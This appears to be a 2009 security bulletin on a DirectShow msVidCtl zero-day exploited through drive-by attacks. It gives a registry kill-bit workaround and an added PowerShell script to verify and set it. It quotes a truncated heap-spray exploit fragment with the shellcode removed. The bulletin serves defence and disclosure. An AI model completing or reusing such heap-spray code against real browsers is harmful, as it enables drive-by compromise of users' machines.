Last Updated: 2009-07-07 14:08:53 UTC
by Stephen Hall (Version: 2)
A 0-day vulnerability in the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The exploit code has been published in the public domain via a number of Chinese web sites.
Please keep a watchful eye on your AV and IDS/IPS vendors' updates to ensure coverage as early as possible on this exploit, as it is likely to be widely deployed now that the code is available.
A valid workaround for the attack vector is available, which sets the kill bit on the vulnerable DLL:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
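The .reg file above only sets the value; it does not tell you whether the kill bit was already present or whether it took effect on a given machine. The following PowerShell script, added here as an example and not part of the original post, checks the Compatibility Flags value for the CLSID named above and ORs in the 0x400 kill bit only if it is missing, preserving any other flags already set. It assumes it is run from an elevated prompt; the Wow6432Node path is an additional check not mentioned in the post (32-bit Internet Explorer on 64-bit Windows reads the ActiveX Compatibility key from that hive), and it is skipped on machines where it does not exist.

```powershell
# Added example: verify and, if needed, set the IE kill bit for the msVidCtl control.
# The CLSID is the one from the .reg workaround above. Run from an elevated prompt.
$Clsid   = '{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}'
$KillBit = 0x400   # Compatibility Flags bit that blocks the control from loading in IE

# 32-bit IE on 64-bit Windows reads the Wow6432Node copy of the key (assumed extra check;
# the second path simply does not exist on 32-bit Windows and is skipped).
$BasePaths = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-CompatFlags {
    param([string]$Key)
    # Returns the current Compatibility Flags DWORD, or 0 if the key/value is absent
    if (-not (Test-Path $Key)) { return 0 }
    $prop = Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $prop) { return 0 }
    return [int]$prop.'Compatibility Flags'
}

function Test-KillBit {
    param([string]$BasePath, [string]$Clsid)
    $key = Join-Path $BasePath $Clsid
    return ((Get-CompatFlags -Key $key) -band $KillBit) -eq $KillBit
}

function Set-KillBit {
    param([string]$BasePath, [string]$Clsid)
    $key = Join-Path $BasePath $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    # OR in the kill bit so any other flags already present are kept
    $new = (Get-CompatFlags -Key $key) -bor $KillBit
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
}

foreach ($base in $BasePaths) {
    if (-not (Test-Path $base)) { continue }   # Wow6432Node hive absent on 32-bit Windows
    if (Test-KillBit -BasePath $base -Clsid $Clsid) {
        Write-Host "Kill bit already set under $base"
    } else {
        Set-KillBit -BasePath $base -Clsid $Clsid
        Write-Host "Kill bit set under $base"
    }
}
```

Running the script a second time reports "already set" for each path, which makes it usable as a compliance check across a fleet; the Test-KillBit function alone can be run without elevation to audit machines before deploying the .reg file.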
Details of the exploit are available on the CSIS web site and are also included below (shellcode removed, snippet truncated as published):
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
[SHELL CODE REMOVED]
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length
UPDATE July 6, 2009 19:00 UTC
Microsoft has released an advisory for the exploit; it can be found here:
http://www.microsoft.com/technet/security/advisory/972890.mspx
In addition, they have published a number of blog entries to cover their user base:
http://blogs.technet.com/msrc/default.aspx
http://www.microsoft.com/technet/security/advisory/default.mspx
http://blogs.technet.com/srd/